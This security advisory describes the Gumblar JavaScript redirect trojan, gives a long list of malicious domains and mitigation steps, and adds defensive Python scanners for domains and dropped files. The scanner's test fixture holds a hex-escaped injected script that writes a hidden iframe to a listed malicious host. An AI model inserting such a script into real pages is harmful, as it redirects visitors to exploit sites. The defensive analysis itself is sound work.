| Alias/es | JS/Redir.MR!tr, Trojan-Downloader.JS.Gumblar.a (Kaspersky), Obfuscated Script.f.gen trojan (McAfee), JS/Redir.M (FProt) |
| Release Date | Jun 03, 2009 |
| Detection Availability | Current Antivirus Definition Database Version: 12.338 |

Description

Visible Symptoms
- The browser is redirected to malicious websites.
- Malicious files may be downloaded.
Detailed Analysis
This detection is for an obfuscated script that is injected into compromised websites via cross-site scripting. The malicious URL is encoded in the script.
With more than 3,500 instances of website infections caused by the 'Gumblar' trojan in Japan as of this writing, enterprises need to guard their administrative passwords more closely, as the attack indicates that the security of the respective web servers may have been compromised. Administrative password theft can happen either remotely or locally.
Hackers may sniff for passwords with a bot application or access the server locally. In either case, once administrative rights have been compromised illegitimately, the hacker can strike at any time regardless of location.
When internet users visit infected websites, the injected script redirects the web browser to the malicious website that is hosting other malicious downloadable components such as PDF and SWF files. These files contain exploits which eventually download a malicious Win32 executable.
The behavior of this trojan is very similar to JS/Redir.MR!tr.
Technical Details
- The malware basically redirects infected host sites to another infected website, which most commonly contains an infected PDF or another malicious binary.
- As of this writing, the following websites have been extracted from the malware code and appear to serve as part of the botnet used by Gumblar:
- gmj100.com
- jkbioindia.com
- liverpoolgoldenestates.co.uk
- martuz.cn
- skream.jp
- srpskidespot.org.rs
- jthinc.net
- eco-pro.org
- cima-afrique.org
- cuthouse.net
- e-walker.com
- 01024239114.kt.io
- clashforum.com
- snapemotorcompany.org.uk
- hydreka.fr
- victoryskitchen.com
- yourdesignservices.com
- sites-counter.com
- reme.uji.es
- oerotrading.com
- articles.koraja.com
- stats.analytics.info
- kingofbelgrade.com
- usepetrol2ea.com
- lakyrnikcup.cz
- transmarecuador.com
- balasmeer.com
- paketik.by
- curbmaker.biz
- parnu.aakv.ee
- foro.gamesquality.com
- greenvibs.com
- krasota.dietologam.ru
- wolfaartsen.com
- music-x.nkk.lt
- kfea.kr
- schitkomplekt.ru
- pamaku-auspuff-zentrum.de
- global-paratransit.com
- stockbuzzindia.com
- fitdurchphysio.de
- china.schreiber-hp.de
- 0314918631.kt.io
- wholemanministries.net
- rts-me.com
- typicaldesign.net
- tssauto.ru
- jgreenjewelers.net
- indiatouragency.com
- vasaikar.org
- rosentadesign.se
- download.ir
- impressionbt.com
- lauwaert.net
- tentimes10.com
- akiciplastik.com
- Most of the recovered files are found to be infected by various means, including injected code in HTML, JS and PHP scripts. Victims expose themselves by downloading free JS scripts from the Internet; these scripts take control of the victim's PC by exploiting popular vulnerabilities in the browser and plug-ins, such as Adobe Reader and Adobe Flash Player. These vulnerabilities include the following:
For vulnerability CVE-2007-0071, Gumblar uses a similar runtime packer discussed in the FortiGuard Centre blog entry titled "Flash Mob Episode II: Attack of the Clones".
- The malicious script varies in functionality. Some variants solely create a link that redirects to infected sites; others also apply changes on the infected host. The following have been observed in some variants of the Gumblar script:
  - Drop a copy of itself in the Startup folder of the Start Menu
  - Drop a copy of itself in the Program Files folder, where the most commonly used filename is Uninstall.exe
  - Drop a copy of itself in the current user's home folders
  - Register the malicious PDF/Shockwave file
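The domain list and the injected-script description above suggest a simple defender-side check: scan web files and proxy or web-filter logs for references to the listed domains. Because the advisory says the malicious URL is encoded in the script, the scanner below first decodes the common JavaScript and URL escape forms (`\xNN`, `\uNNNN`, `%NN`) before matching; which encoding Gumblar actually used is not stated on this page, so that choice is an assumption. This is an added example, not Fortinet's code; the domain subset is taken from the list above, and the HTML page and log lines are constructed for the example.

```python
"""Scan web files and proxy/web-filter logs for references to the domains this
advisory associates with Gumblar, including references hidden behind common
JavaScript and URL escape sequences."""
import re
from typing import Dict, List

# Domains taken from the list in this advisory (a subset, to keep the example short).
GUMBLAR_DOMAINS = [
    "gmj100.com", "martuz.cn", "skream.jp", "jthinc.net", "eco-pro.org",
    "cuthouse.net", "01024239114.kt.io", "stats.analytics.info", "download.ir",
]

# Escape forms an injected script commonly uses to hide a string literal. The
# advisory does not say which encoding Gumblar used; these three are an assumption.
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
PCT_ESC = re.compile(r"%([0-9a-fA-F]{2})")


def normalise(line: str) -> str:
    """Decode \\xNN, \\uNNNN and %NN escapes, then lower-case the result."""
    line = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), line)
    line = UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), line)
    line = PCT_ESC.sub(lambda m: chr(int(m.group(1), 16)), line)
    return line.lower()


def _domain_pattern(domain: str) -> "re.Pattern[str]":
    # Match the domain itself or any subdomain of it, but not a longer name that
    # merely ends with the same characters (e.g. "notmartuz.cn").
    return re.compile(r"(?<![a-z0-9-])" + re.escape(domain) + r"(?![a-z0-9-])")


PATTERNS = {d: _domain_pattern(d) for d in GUMBLAR_DOMAINS}


def scan_text(source: str, text: str) -> List[Dict]:
    """Return one finding per line that references a listed domain."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        decoded = normalise(raw)
        hits = [d for d, pat in PATTERNS.items() if pat.search(decoded)]
        if hits:
            findings.append({
                "source": source,
                "line": lineno,
                "domains": hits,
                "text": raw.strip()[:120],
            })
    return findings


# Constructed sample page: a clean site with one injected <script> whose URL is
# written as \xNN escapes ("http://martuz.cn/"). Not a real capture.
SAMPLE_HTML = """<html><head><title>Example shop</title>
<script src="/js/jquery.js"></script>
</head><body>
<p>Welcome</p>
<script>var u="\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6d\\x61\\x72\\x74\\x75\\x7a\\x2e\\x63\\x6e\\x2f";document.write('<iframe src="'+u+'">');</script>
</body></html>"""

# Constructed proxy log lines (the log format is invented for the example).
SAMPLE_LOG = """2009-06-03 10:12:01 ws01 GET http://www.example.org/index.html 200
2009-06-03 10:12:02 ws01 GET http://www.skream.jp/images/a.gif 200
"""

if __name__ == "__main__":
    for f in scan_text("index.html", SAMPLE_HTML) + scan_text("proxy.log", SAMPLE_LOG):
        print(f"{f['source']}:{f['line']} -> {', '.join(f['domains'])}: {f['text']}")
```

Run it over a web root with `scan_text(path, open(path).read())` per file, and over proxy logs the same way; a hit in web content points at an injected file to restore from a clean backup, while a hit in the proxy log points at a client that was redirected and should be checked for the host-side symptoms listed under Technical Details. A scanner like this only catches encodings it knows how to undo, so it complements rather than replaces signature-based detection.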
Action
- Enterprises can protect their networks by practicing the general password theft prevention measures listed below:
  - Do not save your passwords in plain text.
  - Avoid communication protocols that transmit credentials in plain text, such as FTP. Use FTPS, FTPES or SFTP instead.
  - Use updated antivirus programs.
  - Apply the latest patches for all software, especially browsers and plug-ins.
  - Always log out from the server after you are done working on it - never walk away from the server while you are logged on.
  - Ensure that the network area has perimeter protection.
  - Do not give your password to untrusted websites or personnel.
- Fortinet customers can protect their networks from these Gumblar attacks by doing the following:
  - Submit any suspicious file or website to FortiGuard Centre for further analysis.
  - Stay updated: we have created virus and IPS detections intended to catch known Gumblar-related infections. In addition, we have created a specific IPS signature ("Gumblar.Botnet") to block communications between infected PCs and the command-and-control (C&C) server, and added Web Filtering blocking against access to infected domains (sites hosting malicious files).
  - Ensure that you have deployed FortiGate appliances for network security and FortiClient software for desktop clients and servers.
  - Since this attack exploits several known vulnerabilities in the browser and plug-ins, make sure that all installed software is patched with the latest updates.
  - Last but not least, if you ever suspect that you are infected, change all your passwords and apply all available patches immediately.
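When you suspect a host is infected, the file-system symptoms listed under Technical Details (a copy of the executable in the Start Menu Startup folder, an Uninstall.exe in the root of Program Files, a copy in the user's home folder) can be triaged with a short script. The one below, added here as an example and not part of the advisory or of any Fortinet product, hashes whatever it finds in those three locations and reports any binary that appears in more than one of them, since "a copy of itself" dropped in several places will share a hash. It assumes the Vista-and-later profile layout for the Startup folder, and treating any executable in the profile root as a candidate is a heuristic of this example, not something the advisory states; the directory tree it builds for the demonstration is constructed with placeholder bytes.

```python
"""Triage the file-system locations this advisory lists for Gumblar variants:
the Start Menu Startup folder, the root of Program Files (Uninstall.exe) and
the user's home folder, grouping hits by hash so a binary copied to more than
one of them stands out."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

EXECUTABLE_SUFFIXES = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js"}

# Assumed Vista-and-later profile layout; on Windows XP the per-user Startup folder
# is "Start Menu\Programs\Startup" directly under the profile root instead.
STARTUP_SUBPATH = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _executables_in(folder: Path) -> List[Path]:
    """Executable-looking files directly inside folder (no recursion)."""
    if not folder.is_dir():
        return []
    return sorted(p for p in folder.iterdir()
                  if p.is_file() and p.suffix.lower() in EXECUTABLE_SUFFIXES)


def collect_candidates(program_files: Path, user_profile: Path) -> List[Dict]:
    """Files in the three locations the advisory names, with their hashes."""
    found: List[Dict] = []
    # 1. Anything executable placed directly in the user's Startup folder.
    for p in _executables_in(user_profile / STARTUP_SUBPATH):
        found.append({"location": "startup-folder", "path": p, "sha256": sha256_of(p)})
    # 2. Uninstall.exe in the root of Program Files; legitimate uninstallers live
    #    in vendor subfolders, so a root-level one is worth a look.
    for p in _executables_in(program_files):
        if p.name.lower() == "uninstall.exe":
            found.append({"location": "program-files-root", "path": p, "sha256": sha256_of(p)})
    # 3. Executables directly in the profile root (heuristic; the advisory gives no filename).
    for p in _executables_in(user_profile):
        found.append({"location": "home-folder", "path": p, "sha256": sha256_of(p)})
    return found


def suspicious_groups(candidates: List[Dict]) -> Dict[str, List[Dict]]:
    """Group candidates by hash and keep hashes seen in two or more locations:
    one binary dropped as 'a copy of itself' in several places."""
    by_hash: Dict[str, List[Dict]] = {}
    for c in candidates:
        by_hash.setdefault(c["sha256"], []).append(c)
    return {h: g for h, g in by_hash.items()
            if len({c["location"] for c in g}) >= 2}


def build_demo_tree(root: Path) -> Tuple[Path, Path]:
    """Constructed layout standing in for a system drive (placeholder bytes, not malware)."""
    program_files = root / "Program Files"
    profile = root / "Users" / "alice"
    (profile / STARTUP_SUBPATH).mkdir(parents=True)
    (program_files / "Vendor").mkdir(parents=True)
    payload = b"MZ" + b"\x00" * 64  # placeholder bytes, not a real executable
    (profile / STARTUP_SUBPATH / "update.exe").write_bytes(payload)
    (program_files / "Uninstall.exe").write_bytes(payload)  # same bytes: a copy
    (program_files / "Vendor" / "uninstall.exe").write_bytes(b"MZ vendor")  # not root-level
    (profile / "notes.txt").write_text("not an executable")
    return program_files, profile


def run_demo() -> Dict[str, int]:
    with tempfile.TemporaryDirectory() as tmp:
        program_files, profile = build_demo_tree(Path(tmp))
        candidates = collect_candidates(program_files, profile)
        groups = suspicious_groups(candidates)
        for digest, group in groups.items():
            print(f"{digest[:12]}... present in: "
                  + ", ".join(f"{c['location']} ({c['path'].name})" for c in group))
        return {"candidates": len(candidates),
                "suspicious_groups": len(groups),
                "files_in_groups": sum(len(g) for g in groups.values())}


if __name__ == "__main__":
    print(run_demo())
```

On a real host, call `collect_candidates(Path(r"C:\Program Files"), Path(r"C:\Users\<name>"))` for each profile; a hash that turns up in two or more of the locations is worth submitting to FortiGuard Centre for analysis, as the Action section recommends, before any cleanup.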
FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Description Last Updated Date: Jan 13, 2010
Reference: ID - 864887